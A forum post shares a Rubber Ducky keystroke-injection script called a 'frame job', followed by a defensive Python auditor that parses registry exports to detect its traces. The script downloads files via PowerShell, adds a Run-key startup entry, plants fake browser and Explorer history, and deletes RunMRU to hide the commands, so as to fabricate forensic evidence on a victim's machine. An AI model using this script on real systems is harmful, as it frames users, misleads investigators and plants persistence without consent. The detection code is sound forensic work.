br0k3nilluzion Posted November 25, 2013

Found this while studying. Interesting.. Hope you guys like it.

http://www.informationwarfarecenter.com/Cyber-Secrets.html
http://www.informationwarfarecenter.com/files/rubber-ducky-frame-job.txt

REM Calling this the rubber ducky frame job. This adds fake information into Windows Registry areas forensic
REM analysts use to track internet usage.
REM Author: Jeremy Martin - jeremy@informationwarfarecenter.com
REM Class: Anti Forensics
REM version 0.1.3
DELAY 1000
GUI r
DELAY 1000
REM Download a file and save it into the temp folder
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://www.informationwarfarecenter.com/CIR/CIR.pdf','%TEMP%\latest-CIR.pdf')
ENTER
DELAY 1000
GUI r
DELAY 1000
REM Download a graphic and save it to temp
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://www.informationwarfarecenter.com/back.jpg','%TEMP%\back.jpg')
ENTER
DELAY 1000
GUI r
DELAY 1000
REM Open Internet Explorer and generate traffic
STRING iexplore.exe http://www.informationwarfarecenter.com/index-4.html
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 1000
REM Fake Internet Explorer history
STRING REG ADD "HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs" /v url1 /d http://www.informationwarfarecenter.com/files/rubber-ducky-frame-job.txt /f
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 1000
REM Fake Internet Explorer history
STRING REG ADD "HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs" /v url2 /d http://www.i-never-went-here.com /f
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 1000
REM Fake Internet Explorer history
STRING REG ADD "HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs" /v url3 /d http://www.i-never-went-here-again.com /f
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 1000
REM Fake Internet Explorer history
STRING REG ADD "HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs" /v url4 /d http://www.i-just-faked-the-url-address.com /f
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 1000
REM Fake Explorer address bar (TypedPaths) history
STRING REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths" /v url1 /d C:\i-just-faked-the-folder /f
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 1000
REM Fake Document History
STRING REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs" /v 0 /d fake-data /f
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 1000
REM Add a startup link for a previously downloaded file. Malware uses this quite often.
STRING REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v fakefile /d "%TEMP%\latest-CIR.pdf" /f
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 1000
REM Changes the background to the previously downloaded graphic
STRING REG ADD "HKCU\Control Panel\Desktop" /v Wallpaper /d %TEMP%\back.jpg /f
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 1000
REM Opens a previously downloaded file
STRING powershell Start-Process "%TEMP%\latest-CIR.pdf"
ENTER
DELAY 1500
GUI r
DELAY 1000
REM Removes evidence of previous entries (the Run-dialog commands typed above)
STRING REG DELETE "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /f
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 1000
REM Add another fake evidence entry
STRING REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /v a /d "iexplore www.informationwarfarecenter.com/files/BGIU.zip" /f
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 1000
REM Opens a previously downloaded graphic
STRING %TEMP%\back.jpg
DELAY 1000
ENTER
DELAY 1000
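The keys the script above writes into (TypedURLs, TypedPaths, RecentDocs, RunMRU, Run) are exactly the ones an examiner reads, so the practical question for the defensive side is whether values planted with REG ADD can be told apart from values Explorer and Internet Explorer write themselves. The Python below is an added example, not part of the original post and not code from the Information Warfare Center script. It parses the text of a `reg export` of those keys and flags three kinds of residue this script leaves: RunMRU commands without the trailing `\1` that Explorer appends, and no MRUList value after `REG DELETE /va`; a RecentDocs value that is REG_SZ, where Explorer stores REG_BINARY shell items; and, on IE versions that keep a TypedURLsTime key, a `urlN` value in TypedURLs with no timestamp twin. The two .reg samples are constructed for the example (they are not from any real machine), and `parse_reg_export`, `audit` and the findings format are mine, not an API of any tool.

```python
import re

# Two constructed `reg export` samples (not taken from any real machine). PLANTED mimics
# what the frame-job script leaves behind: RunMRU with MRUList wiped by REG DELETE /va, a
# RecentDocs value written as a plain string, a TypedURLs entry with no TypedURLsTime twin.
PLANTED = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="iexplore www.informationwarfarecenter.com/files/BGIU.zip"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs]
"MRUListEx"=hex:00,00,00,00,ff,ff,ff,ff
"0"="fake-data"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs]
"url1"="http://www.informationwarfarecenter.com/files/rubber-ducky-frame-job.txt"
"url2"="http://www.i-never-went-here.com"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLsTime]
"url1"=hex:80,3a,4b,56,2e,ef,ce,01
'''
# CLEAN: the same keys as Explorer and Internet Explorer write them on their own.
CLEAN = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"MRUList"="ba"
"a"="cmd\\1"
"b"="notepad\\1"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs]
"MRUListEx"=hex:00,00,00,00,ff,ff,ff,ff
"0"=hex:72,00,65,00,70,00,6f,00,72,00,74,00,2e,00,70,00,64,00,66,00,00,00,\
  32,00,00,00

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs]
"url1"="http://www.example.com/"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLsTime]
"url1"=hex:80,3a,4b,56,2e,ef,ce,01
'''

_VALUE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')  # "name"=data or @=data
_unescape = lambda s: re.sub(r"\\(.)", r"\1", s)          # .reg escapes \ and " with a backslash

def parse_reg_export(text):
    """Parse the subset of .reg syntax `reg export` emits: [key] headers, quoted REG_SZ
    strings, hex: REG_BINARY data (continued by a trailing backslash). Returns
    {key_path: {value_name: (type, data)}}."""
    hive, key, pending = {}, None, None
    for raw in text.splitlines():
        line = raw.strip()
        if pending is not None:                      # continuation line of a hex: value
            pending[1] += line.rstrip("\\")
            if not line.endswith("\\"):
                hive[key][pending[0]] = ("REG_BINARY", bytes.fromhex(pending[1].replace(",", "")))
                pending = None
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            hive[key] = {}
            continue
        m = _VALUE.match(line)
        if m is None or key is None:                 # file header, blank line or unsupported type
            continue
        name = _unescape(m.group(1)) if m.group(1) is not None else ""
        data = m.group(2)
        if data.startswith('"') and data.endswith('"'):
            hive[key][name] = ("REG_SZ", _unescape(data[1:-1]))
        elif data.startswith("hex:") and data.endswith("\\"):
            pending = [name, data[4:-1]]
        elif data.startswith("hex:"):
            hive[key][name] = ("REG_BINARY", bytes.fromhex(data[4:].replace(",", "")))
    return hive

EXPLORER = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer"
IE = r"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer"

def audit(hive):
    """Return (subkey, value_name, reason) triples for values that do not look like
    something Explorer or Internet Explorer wrote on its own."""
    by_lower = {k.lower(): v for k, v in hive.items()}   # registry paths are case-insensitive
    sub = lambda path: by_lower.get(path.lower(), {})
    found = []
    # RunMRU: Explorer stores each Run-dialog command as REG_SZ "command\1" and orders the
    # letters in MRUList. REG ADD writes no "\1"; REG DELETE /va removes MRUList as well.
    run = sub(EXPLORER + r"\RunMRU")
    if run and "MRUList" not in run:
        found.append(("RunMRU", "MRUList", "missing although entries exist"))
    for name, (typ, data) in run.items():
        if name != "MRUList" and (typ != "REG_SZ" or not data.endswith("\\1")):
            found.append(("RunMRU", name, "not in Explorer's 'command\\1' form"))
    # RecentDocs: real entries are REG_BINARY shell items; REG ADD /d writes REG_SZ.
    for name, (typ, _) in sub(EXPLORER + r"\RecentDocs").items():
        if name != "MRUListEx" and typ != "REG_BINARY":
            found.append(("RecentDocs", name, "is %s, expected REG_BINARY" % typ))
    # TypedURLs: where IE keeps a TypedURLsTime key, every urlN has a FILETIME twin there;
    # a value added with REG ADD to TypedURLs alone does not.
    if (IE + r"\TypedURLsTime").lower() in by_lower:
        times = sub(IE + r"\TypedURLsTime")
        for name in sub(IE + r"\TypedURLs"):
            if name not in times:
                found.append(("TypedURLs", name, "no matching TypedURLsTime value"))
    return found

if __name__ == "__main__":
    print(*audit(parse_reg_export(PLANTED)), sep="\n")
```

Run against the PLANTED sample this reports the wiped MRUList, the `a` entry without `\1`, the string-typed RecentDocs `0` and `url2` with no time twin; the CLEAN sample produces nothing. These checks only catch the residue of this particular script: an attacker who uses `REG ADD /t REG_BINARY`, appends `\1` and rebuilds MRUList by hand evades them, and the text form of `reg export` carries no key last-write timestamps, which are the stronger signal. Treat the script as a baseline for what a hive parser run over an offline NTUSER.DAT should also be looking at, not as a complete detector.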
br0k3nilluzion (Author) Posted November 25, 2013

A YouTube video of it in action as well